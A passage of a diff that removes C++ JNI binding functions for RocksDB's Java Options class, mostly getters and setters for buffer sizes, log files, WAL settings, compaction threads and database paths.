-      reinterpret_cast<rocksdb::Options*>(jhandle)->comparator =
-          rocksdb::BytewiseComparator();
-      break;
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setComparatorHandle
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setComparatorHandle__JJ(
-    JNIEnv* env, jobject jobj, jlong jopt_handle, jlong jcomparator_handle) {
-  reinterpret_cast<rocksdb::Options*>(jopt_handle)->comparator =
-      reinterpret_cast<rocksdb::Comparator*>(jcomparator_handle);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMergeOperatorName
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setMergeOperatorName(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jop_name) {
-  const char* op_name = env->GetStringUTFChars(jop_name, nullptr);
-  if(op_name == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  options->merge_operator = rocksdb::MergeOperators::CreateFromStringId(
-        op_name);
-
-  env->ReleaseStringUTFChars(jop_name, op_name);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMergeOperator
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setMergeOperator(
-  JNIEnv* env, jobject jobj, jlong jhandle, jlong mergeOperatorHandle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->merge_operator =
-    *(reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>*>
-      (mergeOperatorHandle));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWriteBufferSize
- * Signature: (JJ)I
- */
-void Java_org_rocksdb_Options_setWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwrite_buffer_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jwrite_buffer_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->write_buffer_size =
-        jwrite_buffer_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writeBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writeBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->write_buffer_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxWriteBufferNumber
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_write_buffer_number) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_write_buffer_number =
-          jmax_write_buffer_number;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setStatistics
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setStatistics(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jstatistics_handle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* pSptr =
-      reinterpret_cast<std::shared_ptr<rocksdb::StatisticsJni>*>(
-          jstatistics_handle);
-  opt->statistics = *pSptr;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    statistics
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_statistics(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  std::shared_ptr<rocksdb::Statistics> sptr = opt->statistics;
-  if (sptr == nullptr) {
-    return 0;
-  } else {
-    std::shared_ptr<rocksdb::Statistics>* pSptr =
-        new std::shared_ptr<rocksdb::Statistics>(sptr);
-    return reinterpret_cast<jlong>(pSptr);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxWriteBufferNumber
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_write_buffer_number;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    errorIfExists
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_errorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->error_if_exists;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setErrorIfExists
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setErrorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean error_if_exists) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->error_if_exists =
-      static_cast<bool>(error_if_exists);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    paranoidChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_paranoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->paranoid_checks;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setParanoidChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setParanoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean paranoid_checks) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->paranoid_checks =
-      static_cast<bool>(paranoid_checks);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setEnv
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setEnv(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jenv) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->env =
-      reinterpret_cast<rocksdb::Env*>(jenv);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxTotalWalSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_total_wal_size) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_total_wal_size =
-      static_cast<jlong>(jmax_total_wal_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxTotalWalSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      max_total_wal_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxOpenFiles
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_open_files;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxOpenFiles
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_open_files) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_open_files =
-      static_cast<int>(max_open_files);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxFileOpeningThreads
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_file_opening_threads) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_file_opening_threads =
-      static_cast<int>(jmax_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxFileOpeningThreads
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<int>(opt->max_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useFsync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->use_fsync;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseFsync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_fsync) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->use_fsync =
-      static_cast<bool>(use_fsync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_Options_setDbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  std::vector<rocksdb::DbPath> db_paths;
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  jboolean has_exception = JNI_FALSE;
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    jobject jpath = reinterpret_cast<jstring>(env->
-        GetObjectArrayElement(jpaths, i));
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    std::string path = rocksdb::JniUtil::copyString(
-        env, static_cast<jstring>(jpath), &has_exception);
-    env->DeleteLocalRef(jpath);
-
-    if(has_exception == JNI_TRUE) {
-        env->ReleaseLongArrayElements(
-            jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-        return;
-    }
-
-    jlong jtarget_size = ptr_jtarget_size[i];
-
-    db_paths.push_back(
-        rocksdb::DbPath(path, static_cast<uint64_t>(jtarget_size)));
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->db_paths = db_paths;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbPathsLen
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_dbPathsLen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->db_paths.size());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_Options_dbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    rocksdb::DbPath db_path = opt->db_paths[i];
-
-    jstring jpath = env->NewStringUTF(db_path.path.c_str());
-    if(jpath == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    env->SetObjectArrayElement(jpaths, i, jpath);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jpath);
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-
-    ptr_jtarget_size[i] = static_cast<jint>(db_path.target_size);
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_COMMIT);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbLogDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_dbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->db_log_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDbLogDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setDbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jdb_log_dir) {
-  const char* log_dir = env->GetStringUTFChars(jdb_log_dir, nullptr);
-  if(log_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  reinterpret_cast<rocksdb::Options*>(jhandle)->db_log_dir.assign(log_dir);
-  env->ReleaseStringUTFChars(jdb_log_dir, log_dir);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_walDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->wal_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setWalDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jwal_dir) {
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, nullptr);
-  if(wal_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  reinterpret_cast<rocksdb::Options*>(jhandle)->wal_dir.assign(wal_dir);
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    deleteObsoleteFilesPeriodMicros
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_deleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->delete_obsolete_files_period_micros;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDeleteObsoleteFilesPeriodMicros
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setDeleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong micros) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->delete_obsolete_files_period_micros =
-          static_cast<int64_t>(micros);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBaseBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setBaseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->base_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    baseBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_baseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->base_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxSubcompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_subcompactions = static_cast<int32_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxSubcompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_subcompactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBackgroundFlushes
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_background_flushes;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBackgroundFlushes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_background_flushes) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_background_flushes =
-      static_cast<int>(max_background_flushes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxLogFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_log_file_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxLogFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_log_file_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(max_log_file_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->max_log_file_size =
-        max_log_file_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    logFileTimeToRoll
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_logFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->log_file_time_to_roll;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLogFileTimeToRoll
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setLogFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong log_file_time_to_roll) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      log_file_time_to_roll);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->log_file_time_to_roll =
-        log_file_time_to_roll;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    keepLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_keepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->keep_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setKeepLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setKeepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong keep_log_file_num) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(keep_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->keep_log_file_num =
-        keep_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    recycleLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_recycleLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->recycle_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRecycleLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRecycleLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong recycle_log_file_num) {
-  rocksdb::Status s =
-      rocksdb::check_if_jlong_fits_size_t(recycle_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->recycle_log_file_num =
-        recycle_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxManifestFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_manifest_file_size;
-}
-
-/*
- * Method:    memTableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_memTableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  rocksdb::MemTableRepFactory* tf = opt->memtable_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  // temporarly fix for the historical typo
-  if (strcmp(tf->Name(), "HashLinkListRepFactory") == 0) {
-    return env->NewStringUTF("HashLinkedListRepFactory");
-  }
-
-  return env->NewStringUTF(tf->Name());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxManifestFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_manifest_file_size) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_manifest_file_size =
-      static_cast<int64_t>(max_manifest_file_size);
-}
-
-/*
- * Method:    setMemTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMemTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->memtable_factory.reset(
-      reinterpret_cast<rocksdb::MemTableRepFactory*>(jfactory_handle));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  std::shared_ptr<rocksdb::RateLimiter> *pRateLimiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(
-          jrate_limiter_handle);
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      rate_limiter = *pRateLimiter;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLogger
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setLogger(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jlogger_handle) {
-std::shared_ptr<rocksdb::LoggerJniCallback> *pLogger =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(
-          jlogger_handle);
-  reinterpret_cast<rocksdb::Options*>(jhandle)->info_log = *pLogger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setInfoLogLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setInfoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jlog_level) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->info_log_level =
-      static_cast<rocksdb::InfoLogLevel>(jlog_level);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    infoLogLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_infoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return static_cast<jbyte>(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->info_log_level);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    tableCacheNumshardbits
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_tableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->table_cache_numshardbits;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setTableCacheNumshardbits
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setTableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint table_cache_numshardbits) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->table_cache_numshardbits =
-      static_cast<int>(table_cache_numshardbits);
-}
-
-/*
- * Method:    useFixedLengthPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_useFixedLengthPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->prefix_extractor.reset(
-      rocksdb::NewFixedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Method:    useCappedPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_useCappedPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->prefix_extractor.reset(
-      rocksdb::NewCappedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_walTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_ttl_seconds;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalTtlSeconds
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWalTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_ttl_seconds) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_ttl_seconds =
-      static_cast<int64_t>(WAL_ttl_seconds);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_walSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_size_limit_MB;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalSizeLimitMB
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWalSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_size_limit_MB) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_size_limit_MB =
-      static_cast<int64_t>(WAL_size_limit_MB);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    manifestPreallocationSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_manifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->manifest_preallocation_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setManifestPreallocationSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setManifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong preallocation_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(preallocation_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->manifest_preallocation_size =
-        preallocation_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Method:    setTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->table_factory.reset(
-      reinterpret_cast<rocksdb::TableFactory*>(jfactory_handle));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowMmapReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_reads;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowMmapReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_reads) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_reads =
-      static_cast<bool>(allow_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowMmapWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_writes;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowMmapWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_writes) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_writes =
-      static_cast<bool>(allow_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useDirectReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useDirectReads(JNIEnv* env, jobject jobj,
-                                                 jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->use_direct_reads;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseDirectReads(JNIEnv* env, jobject jobj,
-                                                jlong jhandle,
-                                                jboolean use_direct_reads) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->use_direct_reads =
